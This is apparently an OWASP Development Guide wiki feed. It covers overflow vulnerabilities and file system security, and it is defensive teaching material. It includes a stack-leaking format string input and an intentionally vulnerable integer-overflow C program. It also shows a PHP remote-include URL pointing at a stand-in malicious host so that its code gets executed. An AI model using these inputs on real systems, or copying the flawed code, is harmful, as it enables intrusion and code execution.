&lt;br /&gt;
* is written in a language (or depends upon a program that is written in a language)  that allows buffer overflows to be created (see Table 8.1) AND&lt;br /&gt;
&lt;br /&gt;
* copies data from one buffer on the stack to another without checking sizes first AND&lt;br /&gt;
&lt;br /&gt;
* does not use techniques such as canary values to prevent buffer overflows THEN&lt;br /&gt;
&lt;br /&gt;
it is likely that the application is vulnerable to attack.&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
# Use higher-level programming languages that are strongly typed and that disallow direct memory access. &lt;br /&gt;
# Validate input to prevent unexpected data from being processed, such as being too long, of the wrong data type, containing &amp;quot;junk&amp;quot; characters, etc. &lt;br /&gt;
# If relying upon operating system functions or utilities written in a vulnerable language, ensure that they:&lt;br /&gt;
## use the principle of least privilege&lt;br /&gt;
## use compilers that protect against stack and heap overflows&lt;br /&gt;
## are current in terms of patches&lt;br /&gt;
&lt;br /&gt;
==Format String ==&lt;br /&gt;
&lt;br /&gt;
Format string buffer overflows (usually called &amp;quot;format string vulnerabilities&amp;quot;) are highly specialized buffer overflows that can have the same effects as other buffer overflow attacks. Basically, format string vulnerabilities take advantage of the mixture of data and control information in certain functions, such as C/C++'s printf. The easiest way to understand this class of vulnerability is with an example:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
#include &amp;lt;stdlib.h&amp;gt;&lt;br /&gt;
#include &amp;lt;unistd.h&amp;gt;&lt;br /&gt;
#include &amp;lt;string.h&amp;gt;&lt;br /&gt;
&lt;br /&gt;
int main(void) {&lt;br /&gt;
    char str[100];&lt;br /&gt;
    scanf(&amp;quot;%99s&amp;quot;, str);&lt;br /&gt;
    printf(&amp;quot;%s&amp;quot;, str);&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
This simple program takes input from the user and displays it back on the screen. The string &amp;lt;code&amp;gt;%s&amp;lt;/code&amp;gt; means that the other parameter, str, should be displayed as a string. This example is ''not'' vulnerable to a format string attack, but if one changes the last line, it becomes exploitable:&lt;br /&gt;
&lt;br /&gt;
    printf(str);&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
To see how, consider the user entering the special input:&lt;br /&gt;
&lt;br /&gt;
''%08x.%08x.%08x.%08x.%08x''&lt;br /&gt;
&lt;br /&gt;
By constructing input as such, the program can be exploited to print the first five entries from the stack.  &lt;br /&gt;
&lt;br /&gt;
===How to determine if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
If your program:&lt;br /&gt;
&lt;br /&gt;
* uses functions such as printf or snprintf, either directly or indirectly through system services (such as syslog) or other libraries, AND&lt;br /&gt;
&lt;br /&gt;
* the use of such functions allows input from the user to contain control information interpreted by the function itself&lt;br /&gt;
&lt;br /&gt;
it is highly likely that the application is vulnerable to attack.&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
# Use higher-level programming languages that are strongly typed and that disallow direct memory access. &lt;br /&gt;
# Validate input to prevent unexpected data from being processed, such as being too long, of the wrong data type, containing &amp;quot;junk&amp;quot; characters, etc. Specifically check for control information (meta-characters like '%')&lt;br /&gt;
# Avoid the use of functions like printf that allow user input to contain control information&lt;br /&gt;
# If relying upon operating system functions or utilities written in a vulnerable language, ensure that they:&lt;br /&gt;
## use the principle of least privilege&lt;br /&gt;
## use compilers that protect against stack and heap overflows&lt;br /&gt;
## are current in terms of patches&lt;br /&gt;
&lt;br /&gt;
==Unicode Overflow ==&lt;br /&gt;
&lt;br /&gt;
Unicode exploits are a bit more difficult to perform than typical buffer overflows, as demonstrated in Anley’s 2002 paper, but it is wrong to assume that by using Unicode you are protected against buffer overflows. Examples of Unicode overflows include Code Red, a devastating worm with an estimated economic cost in the billions of dollars. &lt;br /&gt;
&lt;br /&gt;
===How to determine if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
If your program:&lt;br /&gt;
&lt;br /&gt;
* is written in a language (or depends upon a program that is written in a language) that allows buffer overflows to be created (see Table 8.1) AND&lt;br /&gt;
&lt;br /&gt;
* takes Unicode input from a user AND&lt;br /&gt;
&lt;br /&gt;
* fails to sanitize the input AND&lt;br /&gt;
&lt;br /&gt;
* does not use techniques such as canary values to prevent buffer overflows THEN&lt;br /&gt;
&lt;br /&gt;
it is highly likely that the application is vulnerable to attack.&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself  ===&lt;br /&gt;
&lt;br /&gt;
# Deploy on systems capable of using non-executable stacks, such as:&lt;br /&gt;
## AMD and Intel x86-64 chips with associated 64-bit operating systems&lt;br /&gt;
## Windows XP SP2 (both 32- and 64-bit)&lt;br /&gt;
## Windows 2003 SP1 (both 32- and 64-bit)&lt;br /&gt;
## Linux after 2.6.8 on AMD and x86-64 processors in 32- and 64-bit mode&lt;br /&gt;
## OpenBSD (w^x on Intel, AMD, SPARC, Alpha and PowerPC)&lt;br /&gt;
## Solaris 2.6 and later with the “noexec_user_stack” flag enabled&lt;br /&gt;
# Use higher-level programming languages that are strongly typed and that disallow direct memory access. &lt;br /&gt;
# Validate input to prevent unexpected data from being processed, such as being too long, of the wrong data type, containing &amp;quot;junk&amp;quot; characters, etc. &lt;br /&gt;
# If relying upon operating system functions or utilities written in a vulnerable language, ensure that they:&lt;br /&gt;
## use the principle of least privilege&lt;br /&gt;
## use compilers that protect against stack and heap overflows&lt;br /&gt;
## are current in terms of patches&lt;br /&gt;
&lt;br /&gt;
==Integer Overflow ==&lt;br /&gt;
&lt;br /&gt;
When an application takes two numbers of fixed word size and performs an operation with them, the result may not fit within the same word size. For example, if the two 8-bit numbers 192 and 208 are added together and stored into another 8-bit byte, the result will not fit into 8 bits:&lt;br /&gt;
&lt;br /&gt;
''         1100 0000''&lt;br /&gt;
&lt;br /&gt;
''  +      1101 0000''&lt;br /&gt;
&lt;br /&gt;
''  = 0001 1001 0000''&lt;br /&gt;
&lt;br /&gt;
Depending on the language, such an operation may raise an exception or, as in C, silently wrap around; your application must be coded to detect the condition and take proper action. Otherwise, your application would report that 192 + 208 equals 144.&lt;br /&gt;
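&lt;br /&gt;
The truncation can be demonstrated with a short C program (a sketch added for illustration):&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
&lt;br /&gt;
int main(void) {&lt;br /&gt;
    unsigned char a = 192;&lt;br /&gt;
    unsigned char b = 208;&lt;br /&gt;
    unsigned char sum = a + b;   // 400 truncated to 8 bits: 400 - 256 = 144&lt;br /&gt;
&lt;br /&gt;
    printf(&amp;quot;%d + %d = %d\n&amp;quot;, a, b, sum);   // prints: 192 + 208 = 144&lt;br /&gt;
    return 0;&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;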
&lt;br /&gt;
The following code demonstrates a buffer overflow, and was adapted from [http://www.phrack.org/phrack/60/p60-0x0a.txt Blexim's Phrack article]:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
#include &amp;lt;stdlib.h&amp;gt;&lt;br /&gt;
#include &amp;lt;string.h&amp;gt;&lt;br /&gt;
&lt;br /&gt;
int main(int argc, char *argv[]) {&lt;br /&gt;
    int i = atoi(argv[1]);         // input from user&lt;br /&gt;
    unsigned short s = i;          // truncate to a short&lt;br /&gt;
    char buf[50];                  // large buffer&lt;br /&gt;
&lt;br /&gt;
    if (s &amp;gt; 10) {                  // check we're not greater than 10&lt;br /&gt;
        return 1;&lt;br /&gt;
    }&lt;br /&gt;
&lt;br /&gt;
    memcpy(buf, argv[2], i);       // copy i bytes to the buffer&lt;br /&gt;
    buf[i] = '\0';                 // add a null byte to the buffer&lt;br /&gt;
    printf(&amp;quot;%s\n&amp;quot;, buf);           // output the buffer contents&lt;br /&gt;
&lt;br /&gt;
    return 0;&lt;br /&gt;
} &lt;br /&gt;
&lt;br /&gt;
[root /tmp]# ./inttest 65546 foobar&lt;br /&gt;
Segmentation fault&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The above code is exploitable because the validation does not occur on the input value (65546), but rather on the value after it has been truncated to an unsigned short (65546 modulo 65536 = 10, which passes the check). &lt;br /&gt;
&lt;br /&gt;
Integer overflows can be a problem in any language and can be exploited when integers are used in array indices and implicit short math operations. &lt;br /&gt;
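&lt;br /&gt;
A minimal sketch of the repair (illustrative, not from the cited article): perform the check on the value the user actually supplied, before any narrowing conversion, and bound it by the buffer size:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
    int i = atoi(argv[1]);&lt;br /&gt;
    char buf[50];&lt;br /&gt;
&lt;br /&gt;
    if (i &amp;lt; 0 || i &amp;gt;= (int)sizeof(buf)) {   // validate the original int, not a truncated copy&lt;br /&gt;
        return 1;&lt;br /&gt;
    }&lt;br /&gt;
&lt;br /&gt;
    memcpy(buf, argv[2], i);   // i is now provably within the buffer&lt;br /&gt;
    buf[i] = '\0';&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A complete fix would also bound i by the length of argv[2] so the copy cannot over-read its source.&lt;br /&gt;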
&lt;br /&gt;
===How to determine if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
* Examine use of signed integers, bytes, and shorts.&lt;br /&gt;
&lt;br /&gt;
* Are there cases where these values are used as array indices after performing an arithmetic operation (+, -, *, /, or % (modulo))?&lt;br /&gt;
&lt;br /&gt;
* How would your program react to a negative or zero integer value, particularly during array lookups?&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
* If using .NET, use David LeBlanc’s SafeInt class or a similar construct. Otherwise, use a &amp;quot;BigInteger&amp;quot; or &amp;quot;BigDecimal&amp;quot; implementation in cases where it would be hard to validate input yourself.&lt;br /&gt;
&lt;br /&gt;
* If your compiler supports the option, change the default for integers to be unsigned unless otherwise explicitly stated. Use unsigned integers whenever you don't need negative values.&lt;br /&gt;
&lt;br /&gt;
* Use range checking if your language or framework supports it, or be sure to implement range checking yourself after all arithmetic operations.&lt;br /&gt;
&lt;br /&gt;
* Be sure to check for exceptions if your language supports it.&lt;br /&gt;
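&lt;br /&gt;
Such range checking can be sketched in C as follows (checked_add is an illustrative helper name, not a standard function):&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#include &amp;lt;limits.h&amp;gt;&lt;br /&gt;
&lt;br /&gt;
/* Stores a + b in *out and returns 1 only when the sum fits in an int. */&lt;br /&gt;
int checked_add(int a, int b, int *out) {&lt;br /&gt;
    if ((b &amp;gt; 0 &amp;amp;&amp;amp; a &amp;gt; INT_MAX - b) ||&lt;br /&gt;
        (b &amp;lt; 0 &amp;amp;&amp;amp; a &amp;lt; INT_MIN - b)) {&lt;br /&gt;
        return 0;   /* the addition would overflow */&lt;br /&gt;
    }&lt;br /&gt;
    *out = a + b;&lt;br /&gt;
    return 1;&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;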
&lt;br /&gt;
==Further reading ==&lt;br /&gt;
&lt;br /&gt;
* Team Teso, ''Exploiting Format String Vulnerabilities''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.cs.ucsb.edu/~jzhou/security/formats-teso.html&amp;lt;/u&amp;gt; [[category:FIXME | link not working]]&lt;br /&gt;
&lt;br /&gt;
* Newsham, Tim, ''Format String Attacks''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.lava.net/~newsham/format-string-attacks.pdf&amp;lt;/u&amp;gt;  [[category:FIXME | link not working]]&lt;br /&gt;
&lt;br /&gt;
* w00w00 and Matt Conover, ''Preliminary Heap Overflow Tutorial''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.w00w00.org/files/articles/heaptut.txt&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
* Chris Anley, ''Creating Arbitrary Shellcode In Unicode Expanded Strings''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.ngssoftware.com/papers/unicodebo.pdf&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
* David LeBlanc, ''Integer Handling with the C++ SafeInt Class''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://msdn.microsoft.com/library/default.asp?url=/library/en-us/dncode/html/secure01142004.asp&amp;lt;/u&amp;gt;     &lt;br /&gt;
&lt;br /&gt;
* Aleph One, ''Smashing the Stack for fun and profit''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.phrack.org/phrack/49/P49-14&amp;lt;/u&amp;gt;  [[category:FIXME | link not working]]&lt;br /&gt;
&lt;br /&gt;
* Mark Donaldson, ''Inside the buffer Overflow Attack: Mechanism, method, &amp;amp; prevention''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://rr.sans.org/code/inside_buffer.php&amp;lt;/u&amp;gt;   [[category:FIXME | link not working]]&lt;br /&gt;
&lt;br /&gt;
* ''NX Bit'', Wikipedia article&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://en.wikipedia.org/wiki/NX_bit&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
* Horizon, ''How to bypass Solaris no execute stack protection''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.secinf.net/unix_security/How_to_bypass_Solaris_nonexecutable_stack_protection_.html&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
* Alexander Anisimov, ''Defeating Microsoft Windows XP SP2 Heap protection and DEP bypass'', Positive Technologies&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.maxpatrol.com/defeating-xpsp2-heap-protection.htm&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
* Blexim, ''Basic Integer Overflows''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.phrack.org/phrack/60/p60-0x0a.txt&amp;lt;/u&amp;gt; [[category:FIXME | link not working]]&lt;br /&gt;
&lt;br /&gt;
* StackShield&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.angelfire.com/sk/stackshield/index.html&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
* StackGuard&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.immunix.org&amp;lt;/u&amp;gt;[[category:FIXME | link not working]]&lt;br /&gt;
&lt;br /&gt;
* Libsafe&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.research.avayalabs.com/project/libsafe&amp;lt;/u&amp;gt; [[category:FIXME | link not working]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Guide Table of Contents|Development Guide Table of Contents]]&lt;br /&gt;
[[Category:OWASP_Guide_Project]]&lt;/div&gt;</summary>
		<author><name>KirstenS</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=File_System&amp;diff=59852</id>
		<title>File System</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=File_System&amp;diff=59852"/>
				<updated>2009-05-02T11:34:52Z</updated>
		
		<summary type="html">&lt;p&gt;KirstenS: /* File upload */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[Guide Table of Contents|Development Guide Table of Contents]]__TOC__&lt;br /&gt;
&lt;br /&gt;
==Objective ==&lt;br /&gt;
&lt;br /&gt;
To ensure that access to the local file system of any of the systems is protected from unauthorized creation, modification, or deletion.&lt;br /&gt;
&lt;br /&gt;
==Environments Affected ==&lt;br /&gt;
&lt;br /&gt;
All. &lt;br /&gt;
&lt;br /&gt;
==Relevant COBIT Topics ==&lt;br /&gt;
&lt;br /&gt;
DS11 – Manage Data – All sections should be reviewed&lt;br /&gt;
&lt;br /&gt;
DS11.9 – Data processing integrity&lt;br /&gt;
&lt;br /&gt;
DS11.20 – Continued integrity of stored data&lt;br /&gt;
&lt;br /&gt;
==Description ==&lt;br /&gt;
&lt;br /&gt;
The file system is a fertile ground for average attackers and script kiddies alike. Attacks can be devastating for the average site, and they are often some of the easiest attacks to perform. &lt;br /&gt;
&lt;br /&gt;
==Best Practices ==&lt;br /&gt;
&lt;br /&gt;
* Use “chroot” jails on Unix platforms&lt;br /&gt;
&lt;br /&gt;
* Use minimal file system permissions on all platforms&lt;br /&gt;
&lt;br /&gt;
* Consider the use of read-only file systems (such as CD-ROM or locked USB key) if practical&lt;br /&gt;
&lt;br /&gt;
==Defacement ==&lt;br /&gt;
&lt;br /&gt;
Defacement is one of the most common attacks against web sites. An attacker uses a tool or technique to upload hostile content over the top of existing files or, via configuration mistakes, as new files. Defacement can be acutely embarrassing, resulting in reputation loss and loss of trust with users. &lt;br /&gt;
&lt;br /&gt;
There are many defacement archives on the Internet, and most defacements occur due to poor patching of vulnerable web servers, but the next most common form of defacement occurs due to web application vulnerabilities. &lt;br /&gt;
&lt;br /&gt;
===How to identify if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
* Is your system up to date? &lt;br /&gt;
&lt;br /&gt;
* Does the file system allow the web user to write to the web content (including directories)?&lt;br /&gt;
&lt;br /&gt;
* Does the application write files with user supplied file names?&lt;br /&gt;
&lt;br /&gt;
* Does the application use file system calls or execute system commands (such as exec() or xp_cmdshell())? &lt;br /&gt;
&lt;br /&gt;
* Would any of these execution or file system calls allow the execution of additional, unauthorized commands? See the OS Injection section for more details.&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
* Ensure or recommend that the underlying operating system and web application environment are kept up to date&lt;br /&gt;
&lt;br /&gt;
* Ensure the application files and resources are read-only&lt;br /&gt;
&lt;br /&gt;
* Ensure the application does not take user supplied file names when saving or working on local files&lt;br /&gt;
&lt;br /&gt;
* Ensure the application properly checks all user supplied input so that additional commands cannot be run&lt;br /&gt;
&lt;br /&gt;
==Path traversal  ==&lt;br /&gt;
&lt;br /&gt;
All but the most simple web applications have to include local resources, such as images, themes, other scripts, and so on. Every time a resource or file is included by the application, there is a risk that an attacker may be able to include a file or remote resource you didn’t authorize. &lt;br /&gt;
&lt;br /&gt;
===How to identify if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
* Inspect code containing file open, include, file create, file delete, and so on&lt;br /&gt;
&lt;br /&gt;
* Determine if it contains unsanitized user input. &lt;br /&gt;
&lt;br /&gt;
* If so, the application is likely to be at risk.&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
* Prefer working without user input when using file system calls&lt;br /&gt;
&lt;br /&gt;
* Use indexes rather than actual portions of file names when templating or using language files (i.e., value 5 from the user submission maps to “Czechoslovakian”, rather than expecting the user to send the string “Czechoslovakian”)&lt;br /&gt;
&lt;br /&gt;
* Ensure the user cannot supply all parts of the path – surround it with your path code&lt;br /&gt;
&lt;br /&gt;
* Validate the user’s input by only accepting known good – do not sanitize the data&lt;br /&gt;
&lt;br /&gt;
* Use chrooted jails and code access policies to restrict where the files can be obtained or saved to&lt;br /&gt;
&lt;br /&gt;
See the OWASP article on [[Path Traversal]] for a description of the attack.&lt;br /&gt;
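&lt;br /&gt;
The index technique above can be sketched in C (the table and helper name are illustrative):&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#include &amp;lt;stddef.h&amp;gt;&lt;br /&gt;
&lt;br /&gt;
static const char *kLanguages[] = { &amp;quot;English&amp;quot;, &amp;quot;French&amp;quot;, &amp;quot;German&amp;quot;, &amp;quot;Czechoslovakian&amp;quot; };&lt;br /&gt;
&lt;br /&gt;
/* Map an untrusted index to a known-good name; the caller builds the path. */&lt;br /&gt;
const char *language_name(int index) {&lt;br /&gt;
    if (index &amp;lt; 0 || index &amp;gt;= (int)(sizeof(kLanguages) / sizeof(kLanguages[0]))) {&lt;br /&gt;
        return NULL;   /* unknown index: refuse rather than accept a user-supplied name */&lt;br /&gt;
    }&lt;br /&gt;
    return kLanguages[index];&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;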
&lt;br /&gt;
==Insecure permissions ==&lt;br /&gt;
&lt;br /&gt;
Many developers take shortcuts to get their applications to work, and many system administrators do not fully understand the risks of permissive file system ACLs.&lt;br /&gt;
&lt;br /&gt;
===How to identify if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
* Can other local users on the system read, modify, or delete files used by the web application?&lt;br /&gt;
&lt;br /&gt;
If so, it is highly likely that the application is vulnerable to local and remote attack.&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
* Use the tightest possible permissions when developing and deploying web applications&lt;br /&gt;
&lt;br /&gt;
* Many web applications can be deployed on read-only media, such as CD-ROMs &lt;br /&gt;
&lt;br /&gt;
* Consider using chroot jails and code access security policies to restrict and control the location and type of file operations even if the system is misconfigured&lt;br /&gt;
&lt;br /&gt;
* Remove all “Everyone:Full Control” ACLs on Windows, and all mode 777 (world writeable) directories and mode 666 (world writeable) files on Unix systems&lt;br /&gt;
&lt;br /&gt;
* Strongly consider removing “Guest”, “everyone,” and world readable permissions wherever possible&lt;br /&gt;
&lt;br /&gt;
==Insecure Indexing ==&lt;br /&gt;
&lt;br /&gt;
Popular tools such as the Google Desktop search engine and Spotlight on the Macintosh allow users to easily find anything on their hard drives. This same wonderful technology allows remote attackers to determine exactly what you have hidden away deep in your application’s guts. &lt;br /&gt;
&lt;br /&gt;
===How to determine if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
* Use Google and a range of other search engines to find something on your web site, such as a meta tag or a hidden file&lt;br /&gt;
&lt;br /&gt;
* If a file is found, your application is at risk.&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
* Use robots.txt – this will prevent most well-behaved search engines from looking any further than what you have in mind, but it offers no protection against hostile crawlers&lt;br /&gt;
&lt;br /&gt;
* Tightly control the activities of any search engine you run for your site, such as the IIS Search Engine, Sharepoint, Google appliance, and so on. &lt;br /&gt;
&lt;br /&gt;
* If you don’t need a searchable index of your web site, disable any search functionality which may be enabled.&lt;br /&gt;
&lt;br /&gt;
==Unmapped files ==&lt;br /&gt;
&lt;br /&gt;
Web application frameworks will interpret only their own file types, and the web server may render all other content as HTML or as plain text. This can disclose secrets and configuration details which an attacker may be able to use to successfully attack the application.&lt;br /&gt;
&lt;br /&gt;
===How to identify if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
Place a file that is not normally visible, such as a configuration file (config.xml or similar), in the web root and request it using a web browser. If the file’s contents are rendered or exposed, then the application is at risk. &lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
* Remove or move all files that do not belong in the web root.&lt;br /&gt;
&lt;br /&gt;
* Rename include files to use a normally processed extension (for example, foo.inc becomes foo.jsp or foo.aspx).&lt;br /&gt;
&lt;br /&gt;
* Map all files that need to remain, such as .xml or .cfg, to an error handler or a renderer that will not disclose the file contents. This may need to be done in both the web application framework’s configuration and the web server’s configuration.&lt;br /&gt;
&lt;br /&gt;
==Temporary files ==&lt;br /&gt;
&lt;br /&gt;
Applications occasionally need to write results or reports to disk. Temporary files, if exposed to unauthorized users, may expose private and confidential information, or allow an attacker to become an authorized user depending on the level of vulnerability.&lt;br /&gt;
&lt;br /&gt;
===How to identify if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
Determine if your application uses temporary files. If it does, check the following:&lt;br /&gt;
&lt;br /&gt;
* Are the files within the web root? If so, can they be retrieved using just a browser? If so, can the files be retrieved without being logged on? &lt;br /&gt;
&lt;br /&gt;
* Are old files exposed? Is there a garbage collector or other mechanism deleting old files?&lt;br /&gt;
&lt;br /&gt;
* Does retrieval of the files expose the application’s workings, or expose private data?&lt;br /&gt;
&lt;br /&gt;
The level of vulnerability is derived from the asset classification assigned to the data.&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
Not all temporary files need to be protected from unauthorized access. For medium to high-risk usage, particularly if the files expose the inner workings of your application or expose private user data, the following controls should be considered:&lt;br /&gt;
&lt;br /&gt;
* The temporary file routines could be re-written to generate the content on the fly rather than storing on the file system.&lt;br /&gt;
&lt;br /&gt;
* Ensure that all resources are not retrievable by unauthenticated users, and that users are authorized to retrieve only their own files.&lt;br /&gt;
&lt;br /&gt;
* Use a “garbage collector” to delete old temporary files, either at the end of a session or within a timeout period, such as 20 minutes.&lt;br /&gt;
&lt;br /&gt;
* If deployed under Unix-like operating systems, use chroot jails to isolate the application from the primary operating system. On Windows, use the inbuilt ACL support to prevent the IIS users from retrieving or overwriting the files directly.&lt;br /&gt;
&lt;br /&gt;
* Move the files to outside the web root to prevent browser-only attacks.&lt;br /&gt;
&lt;br /&gt;
* Use random file names to decrease the likelihood of a brute force file name guessing attack.&lt;br /&gt;
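&lt;br /&gt;
On Unix-like systems, unpredictable temporary names with safe permissions can be obtained from mkstemp(), sketched below in C (the /tmp prefix is illustrative; a directory outside the web root is the point):&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#include &amp;lt;stdlib.h&amp;gt;&lt;br /&gt;
#include &amp;lt;unistd.h&amp;gt;&lt;br /&gt;
&lt;br /&gt;
int open_temp_file(void) {&lt;br /&gt;
    char path[] = &amp;quot;/tmp/report-XXXXXX&amp;quot;;   /* XXXXXX is replaced with random characters */&lt;br /&gt;
    int fd = mkstemp(path);                  /* created with mode 0600, owner-only access */&lt;br /&gt;
&lt;br /&gt;
    if (fd &amp;lt; 0) {&lt;br /&gt;
        return -1;&lt;br /&gt;
    }&lt;br /&gt;
    unlink(path);   /* the file disappears from the namespace once fd is closed */&lt;br /&gt;
    return fd;&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;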
&lt;br /&gt;
==PHP ==&lt;br /&gt;
&lt;br /&gt;
==Includes and Remote files  ==&lt;br /&gt;
&lt;br /&gt;
The PHP functions include() and require() provide an easy way of including and evaluating files. When a file is included, the code it contains inherits the variable scope of the line on which the include statement was executed, so all variables available at that line are available within the included file. Conversely, variables defined in the included file become available to the calling page within the current scope. The included file does not have to be on the local computer: if the allow_url_fopen directive is enabled in php.ini, you can specify the file to be included using a URL. &lt;br /&gt;
&lt;br /&gt;
PHP will get it via HTTP instead of a local pathname. While this is a nice feature it can also be a big security risk. &lt;br /&gt;
&lt;br /&gt;
'''Note: The allow_url_fopen directive is enabled by default. '''&lt;br /&gt;
&lt;br /&gt;
A common mistake is not considering that every file can be called directly; that is, a file written to be included may be requested directly by a malicious user. An example: &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
// file.php&lt;br /&gt;
&lt;br /&gt;
$sIncludePath = '/inc/'; &lt;br /&gt;
&lt;br /&gt;
include($sIncludePath . 'functions.php'); &lt;br /&gt;
&lt;br /&gt;
...&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
// functions.php&lt;br /&gt;
&lt;br /&gt;
include($sIncludePath . 'datetime.php');&lt;br /&gt;
&lt;br /&gt;
include($sIncludePath . 'filesystem.php');&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
In the above example, functions.php is not meant to be called directly, so it assumes the calling page sets $sIncludePath. By creating a file called datetime.php or filesystem.php on another server (and turning off PHP processing on that server) we could call functions.php like the following:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
functions.php?sIncludePath=http://www.malicioushost.com/&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
PHP would nicely download datetime.php from the other server and execute it, which means a malicious user could execute code of his/her choice in functions.php. I would recommend against includes within includes (as the example above). In my opinion, it makes it harder to understand and get an overview of the code. Right now, we want to make the above code safe and to do that we make sure that functions.php really is called from file.php. The code below shows one solution: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
// file.php&lt;br /&gt;
&lt;br /&gt;
define('SECURITY_CHECK', true);&lt;br /&gt;
&lt;br /&gt;
$sIncludePath = '/inc/'; &lt;br /&gt;
&lt;br /&gt;
include($sIncludePath . 'functions.php'); &lt;br /&gt;
&lt;br /&gt;
...&lt;br /&gt;
&lt;br /&gt;
// functions.php&lt;br /&gt;
&lt;br /&gt;
if ( !defined('SECURITY_CHECK') ) {&lt;br /&gt;
&lt;br /&gt;
// Output error message and exit. 	   &lt;br /&gt;
&lt;br /&gt;
...&lt;br /&gt;
&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
include($sIncludePath . 'datetime.php');&lt;br /&gt;
&lt;br /&gt;
include($sIncludePath . 'filesystem.php'); 	  &lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
